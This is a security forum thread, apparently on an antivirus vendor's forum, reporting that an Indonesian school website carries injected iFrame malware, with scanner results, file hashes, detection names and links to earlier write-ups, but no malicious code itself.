SMAN 1 Ternate City - Website injected

Dear All,

Another education domain that got injected by java script to infect the victim through this school website. Today i tried to scanning with some webscanner online tools, and found some scripts of the school website has been injected and caused victim will infected for each visit to this website.

Here’s some location that this website script has been changed :

MW:IFRAME:HD28
Quote

MW:IFRAME:HD28 (Location: index.php)
Quote

Hi Yanto.Chiang,

Happens all the time, see reported here back in 2010: http://forum.avast.com/index.php?topic=66299.0;wap2
Too many exploitable code in not fully updated web apps: http://wordpress.org/support/topic/potential-hack-attempt (poster at wordpress org three years ago = wilddeep). Proof that this is a classical hack ; search Google for parts of the Suspicious Inline Scripts, and you will find many examples…
-.-
As you report (thank for that) we see Google Diagnostic alerts it, Trend Micro Site Safety Center and VScan…
The Wepawet scan does not flag it: http://wepawet.iseclab.org/view.php?hash=16e49118aefcd1098efd445ed95286ff&t=1305548724&type=js
-.-
There also is iFrame malware there
http://wam.dasient.com/wam/infection_library/fd9cb733ad1c9972fd1f3340282d6eaf/cattww (source of write up = Dasient Infection Library). This is cattww.com" malware from 24 April last
On earlier similar iFrame malicious iFrame campaign, see this nice write-up from the Unmasked Parasites Blog source developer:
http://blog.unmaskparasites.com/2010/09/29/geezter-qawfer-and-other-malicious-iframes-from-121-156-57-184/
-.-
DrWeb flags it, INFECTED
htxp://sman1ternate.sch.id/ redirects to hxtp://sman1ternate.sch.id/html/index.php

Checking: htxp://sman1ternate.sch.id/Scripts/AC_RunActiveContent.js
File size: 8321 bytes
File MD5: 9b2224a10312f4ef94fca5bcefee5bdb

htxp://sman1ternate.sch.id/Scripts/AC_RunActiveContent.js - Ok

Checking: htxp://sman1ternate.sch.id/temp/transitionshow.js
File size: 5038 bytes
File MD5: 6a00ca5de507d0408bf076f7c82a39ee

htxp://sman1ternate.sch.id/temp/transitionshow.js - Ok

Checking: hxtp://sman1ternate.sch.id/html/index.php
Engine version: 5.0.2.3300
Total virus-finding records: 2090758
File size: 26.39 KB
File MD5: 237cb42071c725a41a773fbcca501523

hxtp://sman1ternate.sch.id/html/index.php - archive HTML

htxp://sman1ternate.sch.id/html/index.php/Script.0 infected with JS.IFrame.68
htxp://sman1ternate.sch.id/html/index.php/Script.1 - Ok
htxp://sman1ternate.sch.id/html/index.php/Script.2 - Ok
htxp://sman1ternate.sch.id/html/index.php/Script.3 - Ok
htxp://sman1ternate.sch.id/html/index.php/Script.4 - Ok
htxp://sman1ternate.sch.id/html/index.php/Script.5 infected with JS.IFrame.68
hxtp://sman1ternate.sch.id/html/index.php/Script.6 infected with JS.IFrame.68

Certainly the webmaster there has some updating and cleansing to do,

polonus

It also isn’t advisable to post the example script tags that could result in avast alerting on the forum topic. Best to use image examples to display any code.

Just like the attached example. As such script might not be malcious per se, the crypted script in the example could only be there to disguise the true intensions of the malcreant, and therefore is flagged by some av solutions,

polonus

Hi Polonus and David,

Thank you very much for all of your advice,

This matter, we already report to the person in charge of this school but we still got reply yet from them.

Still waiting for their confirmation to change their web script.

cheers,